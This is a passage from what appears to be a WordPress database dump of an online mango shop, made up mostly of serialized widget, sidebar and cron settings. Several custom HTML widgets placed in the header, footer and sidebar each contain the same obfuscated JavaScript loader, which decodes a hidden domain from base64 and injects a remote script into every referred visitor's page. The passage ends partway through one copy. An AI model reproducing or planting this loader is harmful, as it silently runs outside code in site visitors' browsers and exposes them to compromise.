/wp:heading --><!-- wp:latest-posts /--></div><!-- /wp:group -->\";}i:4;a:1:{s:7:\"content\";s:227:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Recent Comments</h2><!-- /wp:heading --><!-- wp:latest-comments {\"displayAvatar\":false,\"displayDate\":false,\"displayExcerpt\":false} /--></div><!-- /wp:group -->\";}i:5;a:1:{s:7:\"content\";s:146:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Archives</h2><!-- /wp:heading --><!-- wp:archives /--></div><!-- /wp:group -->\";}i:6;a:1:{s:7:\"content\";s:150:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Categories</h2><!-- /wp:heading --><!-- wp:categories /--></div><!-- /wp:group -->\";}s:12:\"_multiwidget\";i:1;i:8;a:1:{s:7:\"content\";s:150:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Categories</h2><!-- /wp:heading --><!-- wp:categories /--></div><!-- /wp:group -->\";}i:10;a:0:{}}','yes'),(103,'sidebars_widgets','a:21:{s:19:\"wp_inactive_widgets\";a:21:{i:0;s:7:\"pages-3\";i:1;s:10:\"calendar-3\";i:2;s:12:\"categories-4\";i:3;s:10:\"nav_menu-3\";i:4;s:11:\"nav_menu-12\";i:5;s:13:\"custom_html-3\";i:6;s:7:\"block-2\";i:7;s:7:\"block-3\";i:8;s:7:\"block-4\";i:9;s:7:\"block-5\";i:10;s:8:\"block-10\";i:11;s:21:\"pwb_dropdown_widget-3\";i:12;s:33:\"woocommerce_layered_nav_filters-3\";i:13;s:33:\"woocommerce_layered_nav_filters-5\";i:14;s:25:\"woocommerce_layered_nav-3\";i:15;s:32:\"woocommerce_product_categories-4\";i:16;s:6:\"text-1\";i:17;s:13:\"media_image-4\";i:18;s:7:\"block-8\";i:19;s:7:\"block-6\";i:20;s:12:\"categories-6\";}s:9:\"sidebar-1\";a:5:{i:0;s:11:\"nav_menu-13\";i:1;s:32:\"woocommerce_top_rated_products-1\";i:2;s:22:\"woocommerce_products-1\";i:3;s:17:\"pwb_list_widget-3\";i:4;s:15:\"custom_html-112\";}s:22:\"top-header-widget-col1\";a:1:{i:0;s:15:\"custom_html-113\";}s:22:\"top-header-widget-col2\";a:1:{i:0;s:15:\"custom_html-114\";}s:22:\"top-header-widget-col3\";a:1:{i:0;s:15:\"custom_html-115\";}s:18:\"main-header-widget\";a:1:{i:0;s:15:\"custom_html-116\";}s:16:\"footer-top-first\";a:1:{i:0;s:15:\"custom_html-117\";}s:17:\"footer-top-second\";a:2:{i:0;s:13:\"media_image-1\";i:1;s:15:\"custom_html-118\";}s:16:\"footer-top-third\";a:1:{i:0;s:15:\"custom_html-119\";}s:18:\"footer-below-first\";a:1:{i:0;s:15:\"custom_html-120\";}s:19:\"footer-below-second\";a:2:{i:0;s:13:\"media_image-2\";i:1;s:15:\"custom_html-121\";}s:18:\"footer-below-third\";a:1:{i:0;s:15:\"custom_html-122\";}s:8:\"footer-1\";a:2:{i:0;s:13:\"media_image-3\";i:1;s:15:\"custom_html-123\";}s:8:\"footer-2\";a:3:{i:0;s:22:\"woocommerce_products-2\";i:1;s:10:\"nav_menu-4\";i:2;s:15:\"custom_html-124\";}s:8:\"footer-3\";a:2:{i:0;s:32:\"woocommerce_product_categories-1\";i:1;s:15:\"custom_html-125\";}s:8:\"footer-4\";a:3:{i:0;s:6:\"text-2\";i:1;s:10:\"nav_menu-6\";i:2;s:15:\"custom_html-126\";}s:21:\"open-woo-shop-sidebar\";a:4:{i:0;s:22:\"woocommerce_products-3\";i:1;s:32:\"woocommerce_product_categories-2\";i:2;s:26:\"woocommerce_price_filter-1\";i:3;s:15:\"custom_html-127\";}s:24:\"open-woo-product-sidebar\";a:2:{i:0;s:22:\"woocommerce_products-4\";i:1;s:15:\"custom_html-128\";}s:20:\"sidebar-wcfmmp-store\";a:1:{i:0;s:15:\"custom_html-129\";}s:26:\"sidebar-wcfmmp-store-lists\";a:1:{i:0;s:15:\"custom_html-130\";}s:13:\"array_version\";i:3;}','yes'),(104,'cron','a:49:{i:1747424774;a:1:{s:34:\"arm_handle_updates_db_migrate_data\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:16:\"arm_every_minute\";s:4:\"args\";a:0:{}s:8:\"interval\";i:60;}}}i:1747424813;a:1:{s:43:\"arm_handle_updates_db_migrate_activity_data\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:16:\"arm_every_minute\";s:4:\"args\";a:0:{}s:8:\"interval\";i:60;}}}i:1747424815;a:1:{s:26:\"action_scheduler_run_queue\";a:1:{s:32:\"0d04ed39571b55704c122d726248bbac\";a:3:{s:8:\"schedule\";s:12:\"every_minute\";s:4:\"args\";a:1:{i:0;s:7:\"WP Cron\";}s:8:\"interval\";i:60;}}}i:1747424990;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1747425018;a:1:{s:21:\"rzp_webhook_exec_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:25:\"rzp_webhook_cron_interval\";s:4:\"args\";a:0:{}s:8:\"interval\";i:300;}}}i:1747425038;a:1:{s:33:\"wc_admin_process_orders_milestone\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1747425045;a:1:{s:29:\"wp_session_garbage_collection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1747425418;a:1:{s:20:\"jetpack_clean_nonces\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1747425600;a:2:{s:34:\"jb_check_for_reminder_expired_jobs\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}s:25:\"jb_check_for_expired_jobs\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1747426188;a:1:{s:29:\"wc_admin_unsnooze_admin_notes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1747427009;a:2:{s:33:\"woocommerce_cleanup_personal_data\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:30:\"woocommerce_tracker_send_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747427400;a:1:{s:26:\"wpca/cache_condition_types\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747428370;a:1:{s:32:\"woocommerce_cancel_unpaid_orders\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1747429389;a:1:{s:45:\"woocommerce_marketplace_cron_fetch_promotions\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1747432166;a:1:{s:43:\"armember_lite_send_anonymous_data_cron_func\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1747437799;a:2:{s:24:\"woocommerce_cleanup_logs\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:31:\"woocommerce_cleanup_rate_limits\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747438194;a:1:{s:21:\"wp_update_user_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1747443291;a:1:{s:29:\"give_monthly_scheduled_events\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:7:\"monthly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:2635200;}}}i:1747448599;a:1:{s:28:\"woocommerce_cleanup_sessions\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1747452001;a:1:{s:20:\"jetpack_v2_heartbeat\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747459804;a:1:{s:28:\"elementor/tracker/send_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747460105;a:2:{s:25:\"swpm_account_status_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:33:\"swpm_delete_pending_account_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747461226;a:1:{s:19:\"check_expired_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747462870;a:1:{s:25:\"wpdesk_tracker_send_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747466419;a:7:{s:27:\"arm_handle_change_user_plan\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:30:\"arm_handle_expire_subscription\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:39:\"arm_handle_expire_infinite_subscription\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:25:\"arm_handle_trial_finished\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:39:\"arm_handle_failed_login_log_data_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:49:\"arm_handle_failed_payment_for_manual_subscription\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:47:\"arm_handle_failed_payment_for_auto_subscription\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1747466615;a:1:{s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747466618;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747466674;a:1:{s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1747466682;a:1:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1747467023;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747467283;a:1:{s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1747467799;a:1:{s:14:\"wc_admin_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747473575;a:1:{s:27:\"totalcontest_daily_activity\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747481504;a:1:{s:33:\"charitable_daily_scheduled_events\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747482622;a:1:{s:23:\"mvvwb_cron_action_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747483584;a:2:{s:22:\"jb_delete_old_previews\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:20:\"jb_delete_temp_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747486491;a:1:{s:27:\"give_daily_scheduled_events\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747508400;a:2:{s:34:\"wceb_update_booking_statuses_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:27:\"woocommerce_scheduled_sales\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1747593000;a:2:{s:28:\"wpforms_email_summaries_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}s:33:\"wpforms_weekly_entries_count_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1747640597;a:1:{s:25:\"vendor_weekly_order_stats\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1747732776;a:1:{s:31:\"totalcontest_weekly_environment\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1747780077;a:1:{s:30:\"wp_delete_temp_updater_backups\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1747812216;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1747896130;a:1:{s:30:\"charitable_usage_tracking_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1748004891;a:1:{s:28:\"give_weekly_scheduled_events\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1748377459;a:1:{s:25:\"woocommerce_geoip_updater\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:11:\"fifteendays\";s:4:\"args\";a:0:{}s:8:\"interval\";i:1296000;}}}i:1748461397;a:1:{s:26:\"vendor_monthly_order_stats\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:7:\"monthly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:2635200;}}}i:1748464579;a:1:{s:23:\"one_cc_plugin_sync_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:11:\"fifteendays\";s:4:\"args\";a:0:{}s:8:\"interval\";i:1296000;}}}s:7:\"version\";i:2;}','on'),(105,'widget_pages','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(106,'widget_calendar','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:1:{s:5:\"title\";s:27:\"everything you need to know\";}}','yes'),(107,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'widget_media_image','a:5:{i:1;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:239;s:6:\"height\";i:70;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:4:\"none\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:602;s:3:\"url\";s:95:\"https://www.mangomitra.in/wp-content/uploads/2022/01/images-3_CnyokaDvJmG1xu-e1643111041327.png\";s:5:\"title\";s:0:\"\";}i:2;a:15:{s:4:\"size\";s:6:\"medium\";s:5:\"width\";i:478;s:6:\"height\";i:83;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:105;s:3:\"url\";s:117:\"https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/download-app-footer-image-300x52.png\";s:5:\"title\";s:0:\"\";}i:3;a:15:{s:4:\"size\";s:9:\"thumbnail\";s:5:\"width\";i:512;s:6:\"height\";i:512;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:1906;s:3:\"url\";s:82:\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\";s:5:\"title\";s:0:\"\";}i:4;a:15:{s:4:\"size\";s:6:\"medium\";s:5:\"width\";i:478;s:6:\"height\";i:83;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:105;s:3:\"url\";s:117:\"https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/download-app-footer-image-300x52.png\";s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(110,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(111,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(112,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(113,'widget_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(114,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(115,'widget_nav_menu','a:8:{s:12:\"_multiwidget\";i:1;i:3;a:1:{s:8:\"nav_menu\";i:28;}i:4;a:2:{s:5:\"title\";s:4:\"Help\";s:8:\"nav_menu\";i:42;}i:6;a:0:{}i:8;a:2:{s:5:\"title\";s:17:\"All About Mangoes\";s:8:\"nav_menu\";i:81;}i:10;a:2:{s:5:\"title\";s:16:\"Giveaway Contest\";s:8:\"nav_menu\";i:82;}i:12;a:1:{s:8:\"nav_menu\";i:84;}i:13;a:2:{s:5:\"title\";s:15:\"Advance Booking\";s:8:\"nav_menu\";i:84;}}','yes'),(116,'widget_custom_html','a:21:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}i:112;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:113;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:114;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:115;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:116;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:117;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:118;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 